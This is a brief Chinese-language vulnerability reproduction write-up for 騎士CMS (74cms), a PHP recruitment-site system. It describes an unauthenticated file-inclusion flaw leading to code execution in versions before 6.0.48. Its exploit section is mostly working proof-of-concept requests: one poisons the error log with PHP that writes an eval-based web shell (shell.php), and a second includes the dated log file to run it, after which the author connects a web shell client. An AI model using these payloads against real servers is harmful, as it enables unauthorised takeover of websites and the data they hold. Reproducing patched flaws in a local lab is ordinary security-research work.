騎士CMS文件包含+getshell漏洞復現
0x00簡單介紹
騎士cms人才系統,是一項基於php+mysql為核心的開源人才網站系統。
0x01漏洞概述
騎士cms官方發布安全更新,修復了一處遠程代碼執行漏洞。由於騎士cms某些函數過濾不嚴謹,攻擊者通過構造惡意請求可以在無需登錄情況下執行代碼控制服務器。
0x02影響版本
騎士cms <6.0.48
0x03環境搭建
這里復現使用的是6.0.20(騎士cms不支持php7.0),下載完成后訪問安裝即可
0x04漏洞復現
1、注入模板
發送poc: http://127.0.0.1/74cms/upload/index.php?m=home&a=assign_resume_tpl POST: variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企業id="$_GET['id']"/>
根據報錯查看日志:
路徑為WWW\74cms\upload\data\Runtime\Logs\Home
2、文件包含
發送poc: http://127.0.0.1/74cms/upload/index.php?m=home&a=assign_resume_tpl POST: variable=1&tpl=data/Runtime/Logs/Home/20_12_15.log(日志文件名為日期)
成功寫下shell
菜刀鏈接
0x05參考鏈接
https://mp.weixin.qq.com/s/4-36O4OaWxu2jX2pzb5_Wg
https://blog.csdn.net/weixin_44508748/article/details/111187529